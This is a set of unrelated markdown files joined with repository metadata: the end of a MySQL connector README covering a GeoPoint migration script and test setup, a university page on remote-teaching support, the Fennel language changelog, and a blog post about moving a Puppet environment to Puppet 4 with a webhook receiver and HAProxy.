`Book` should have one foreign key `authorId` integrated }); }); }; ``` #### Breaking Changes with GeoPoint since 5.x Prior to `[email protected]`, MySQL connector was saving and loading GeoPoint properties from the MySQL database in reverse. MySQL expects values to be POINT(X, Y) or POINT(lng, lat), but the connector was saving them in the opposite order(i.e. POINT(lat,lng)). If you have an application with a model that has a GeoPoint property using previous versions of this connector, you can migrate your models using the following programmatic approach: **NOTE** Please back up the database tables that have your application data before performing any of the steps. 1. Create a boot script under `server/boot/` directory with the following: ```js 'use strict'; module.exports = function(app) { function findAndUpdate() { var teashop = app.models.teashop; //find all instances of the model we'd like to migrate teashop.find({}, function(err, teashops) { teashops.forEach(function(teashopInstance) { //what we fetch back from the db is wrong, so need to revert it here var newLocation = {lng: teashopInstance.location.lat, lat: teashopInstance.location.lng}; //only update the GeoPoint property for the model teashopInstance.updateAttribute('location', newLocation, function(err, inst) { if (err) console.log('update attribute failed ', err); else console.log('updateAttribute successful'); }); }); }); } findAndUpdate(); }; ``` 2. Run the boot script by simply running your application or `node .` For the above example, the model definition is as follows: ```json { "name": "teashop", "base": "PersistedModel", "idInjection": true, "options": { "validateUpsert": true }, "properties": { "name": { "type": "string", "default": "storename" }, "location": { "type": "geopoint" } }, "validations": [], "relations": {}, "acls": [], "methods": {} } ``` ## Running tests ### Own instance If you have a local or remote MySQL instance and would like to use that to run the test suite, use the following command: - Linux ```bash MYSQL_HOST=<HOST> MYSQL_PORT=<PORT> MYSQL_USER=<USER> MYSQL_PASSWORD=<PASSWORD> MYSQL_DATABASE=<DATABASE> CI=true npm test ``` - Windows ```bash SET MYSQL_HOST=<HOST> SET MYSQL_PORT=<PORT> SET MYSQL_USER=<USER> SET MYSQL_PASSWORD=<PASSWORD> SET MYSQL_DATABASE=<DATABASE> SET CI=true npm test ``` ### Docker If you do not have a local MySQL instance, you can also run the test suite with very minimal requirements. - Assuming you have [Docker](https://docs.docker.com/engine/installation/) installed, run the following script which would spawn a MySQL instance on your local: ```bash source setup.sh <HOST> <PORT> <USER> <PASSWORD> <DATABASE> ``` where `<HOST>`, `<PORT>`, `<USER>`, `<PASSWORD>` and `<DATABASE>` are optional parameters. The default values are `localhost`, `3306`, `root`, `pass` and `testdb` respectively. - Run the test: ```bash npm test ```
26.058099
354
0.642794
eng_Latn
0.71332
bb42338b55e65d53b01dff0a955d80f2f6787f93
588
md
Markdown
data/article/institute/uk/uk-qmul/2020-04-09-14_23_50.md
drumlab/covid19-datahub
97bc3853c28860673f80292fb1ac7869430d11f1
[ "MIT" ]
5
2020-04-06T13:22:17.000Z
2020-06-24T03:22:12.000Z
data/article/institute/uk/uk-qmul/2020-04-09-14_23_50.md
drumlab/covid19-datahub
97bc3853c28860673f80292fb1ac7869430d11f1
[ "MIT" ]
26
2020-03-30T04:42:14.000Z
2020-04-29T05:33:02.000Z
data/article/institute/uk/uk-qmul/2020-04-09-14_23_50.md
drumlab/covid19-datahub
97bc3853c28860673f80292fb1ac7869430d11f1
[ "MIT" ]
20
2020-03-29T02:09:44.000Z
2020-04-11T03:36:52.000Z
--- title: What support is there for remote teaching and learning? subtitle: date: 2020-04-01 link: >- https://www.qmul.ac.uk/coronavirus/ countryCode: uk status: published instituteSlug: uk-qmul --- Colleagues in the E-Learning Unit and the QM Academy are working to support staff to teach remotely. The link below has details of the technologies and training opportunities that are available, and is being updated as further support is launched. [Coronavirus Help: Remote Teaching Technologies at Queen Mary](https://elearning.qmul.ac.uk/announcements/remote-teaching-at-qmul/)
34.588235
146
0.782313
eng_Latn
0.996113
bb42ec1c893b9a3360c1841542a12103e4caf29c
4,210
md
Markdown
changelog.md
christoph-frick/Fennel
e687f8a7230320a43bce488995ed8c03521f9ffb
[ "MIT" ]
null
null
null
changelog.md
christoph-frick/Fennel
e687f8a7230320a43bce488995ed8c03521f9ffb
[ "MIT" ]
null
null
null
changelog.md
christoph-frick/Fennel
e687f8a7230320a43bce488995ed8c03521f9ffb
[ "MIT" ]
null
null
null
# Summary of user-visible changes ## 0.3.0 / ?? This release introduces several new features to the macro system as well as some breaking changes; the most significant being the new unquote syntax and the requirement of auto-gensym for identifiers in backtick. * **Disallow** non-gensym identifiers in backtick/macros * Support `x#` syntax for auto-gensym inside backtick * Fix a bug in `lambda` arity checks when using destructuring * Support `:one-line` output in fennelview * Add `--eval` argument to command-line launcher * Fix a few bugs in `match` * **Remove** undocumented support for single-quoted strings * Add support for guard clauses with `?` in pattern matching * Support completion in repl when `readline.lua` is available * Add `--globals` and `--globals-only` options to launcher script * **Remove** `luaexpr` and `luastatement` for a single `lua` special * Improve code generation for `if` expressions in many situations * Alias `#` special with `length` * Replace `@` (unquote) with `,`; comma is **no longer** whitespace * **Disallow** `~` in symbols other than `~=` * Add `hashfn` and `#` reader macro for shorthand functions like `#(+ $1 $2)` * Allow hashfn arguments to be used in multisyms * Add `macro` to make defining a single macro easier * Add `(comment)` special which emits a Lua comment in the generated source * Allow lua-style method calls like `(foo:bar baz)`. **Disallow** `:` in symbols. ## 0.2.1 / 2019-01-22 This release mostly contains small bug fixes. * Add `not=` as an alias for `~=` * Fix a bug with `in-scope?` which caused `match` outer unification to fail * Fix a bug with variadic `~=` comparisons * Improve error reporting for mismatched delimiters ## 0.2.0 / 2019-01-17 The second minor release introduces backtick, making macro authoring much more streamlined. Macros may now be defined in the same file, and pattern matching is added. * Prevent creation of bindings that collide with special forms and macros. * Make parens around steps optional in arrow macros for single-arg calls * Allow macros to be defined inline with `macros` * Add `--add-package-path` and `--add-fennel-path` to launcher script * Add `-?>` and `-?>>` macros * Add support for quoting with backtick and unquoting with `@` (later changed to `,`) * Support key/value tables when destructuring * Add `match` macro for pattern matching * Add optional GNU readline support for repl * Fix a bug where runtime errors were not reported by launcher correctly * Allow repl to recover gracefully from parse errors ## 0.1.1 / 2018-12-05 This release contains a few small bug fixes. * Fix luarocks packaging so repl includes fennelview * Fix bug in the repl where locals-saving would fail for certain input * Fix launcher to write errors to stderr, not stdout ## 0.1.0 / 2018-11-29 The first real release sees the addition of several "creature comfort" improvements such as comments, iterator support, line number tracking, accidental global protection, pretty printing, and repl locals. It also introduces the name "Fennel". * Save locals in between chunks in the repl * Allow destructuring in more places * **Remove** redundant `defn` macro * Add `doto` macro * Support newlines in strings * Prevent typos from accidentally referring to unknown globals * Improve readability of compiler output * Add `->` and `->>` macros * **Remove** deprecated special forms: `pack`, `$`, `block`, `*break`, `special` * Support nested lookup in `.` form * Add `var`; disallow regular locals from being set * Add `global`; refuse to set globals without it * Make comparison operators variadic * Support destructuring "rest" of a table into a local with `&` * Add fennelview pretty-printer * Add `require-macros` * Add `//` for integer division on Lua 5.3+ * Add `fennel.dofile` and `fennel.searcher` for `require` support * Track line numbers * Add `partial` * Add `local` * Support binding against multiple values * Add `:` for method calls * Compile tail-calls properly * Rename to Fennel * Add `each` * Add `lambda`/`λ` for arity-checked functions * Add `when` * Add comments ## 0.0.1 / 2016-08-14 The initial version (named "fnl") was created in 8 days and then set aside for several years.
39.716981
85
0.73943
eng_Latn
0.996262
bb4375ddb7fb436ceee78ff8598b3cb704593388
2,570
markdown
Markdown
_posts/2017-02-07-updating-to-puppet-4-part-3.markdown
genebean/jekyll-beanbag
b9943f832ef8ac7aaa3cc7e5c08d322facb47c3a
[ "MIT" ]
null
null
null
_posts/2017-02-07-updating-to-puppet-4-part-3.markdown
genebean/jekyll-beanbag
b9943f832ef8ac7aaa3cc7e5c08d322facb47c3a
[ "MIT" ]
28
2019-05-09T10:19:24.000Z
2022-03-06T18:14:46.000Z
_posts/2017-02-07-updating-to-puppet-4-part-3.markdown
genebean/jekyll-beanbag
b9943f832ef8ac7aaa3cc7e5c08d322facb47c3a
[ "MIT" ]
null
null
null
--- author: gene --- ##### *Hooked and Proxied* When I left off last time a webhook receiver was needed... well, its finished and published to [Puppet Forge] as [genebean/puppetmaster_webhook]. The module creates a custom [Sinatra] application and installs it along with [RVM]. The end result is that you can post messages from GitHub or GitLab and have it deploy the corresponding repository's branch or environment. While I was setting all this up I also decided to front everything with HAProxy so that I could simulate being behind a load balancer immediately and to prepare for the eventual high availability setup that is my end goal. As of today I have it so that all nodes talk to the Puppet master by way of the proxy. [Foreman] and my webhook receiver are also being fronted by the proxy. ##### *Round 1 Complete* The first round of the project was to get everything up to date and using Puppet 4. That part is complete and posted to GitHub at https://github.com/genebean/vagrant-puppet-environment. To quote the description in the repo's readme > This repo has everything needed to setup a Puppet environment in Vagrant. It includes all the components that make up a complete system including load balancer, Puppet Server, PuppetDB, Foreman, r10k, and PostgreSQL. It also pulls down a sample [control repo] for Hiera, roles, and profiles. Having achieved this I can comfortably say that round one is complete which must mean that its time for round two. ##### *Round 2 Coming Up* Round two is starting off with pulling PostgreSQL out onto its own server and then making that server highly available. This will lay the ground work for making the rest of the stack highly available. Based on some research, including a great article entitled *[Journey to High Availability]*, it looks like the first step after the database will be to implement Memcached by way of [theforeman/foreman_memcache] so that [Foreman] will work correctly when clustered. Having said that, things tend to change as you are learning how to cluster an application so I don't think I'll speculate any farther down the road yet. [control repo]:https://github.com/genebean/control-repo [Foreman]:https://theforeman.org/ [genebean/puppetmaster_webhook]:https://forge.puppet.com/genebean/puppetmaster_webhook [Journey to High Availability]:https://theforeman.org/2015/12/journey_to_high_availability.html [Puppet Forge]:https://forge.puppet.com/ [RVM]:https://rvm.io/ [Sinatra]:http://www.sinatrarb.com/ [theforeman/foreman_memcache]:https://github.com/theforeman/foreman_memcache
80.3125
619
0.788716
eng_Latn
0.998842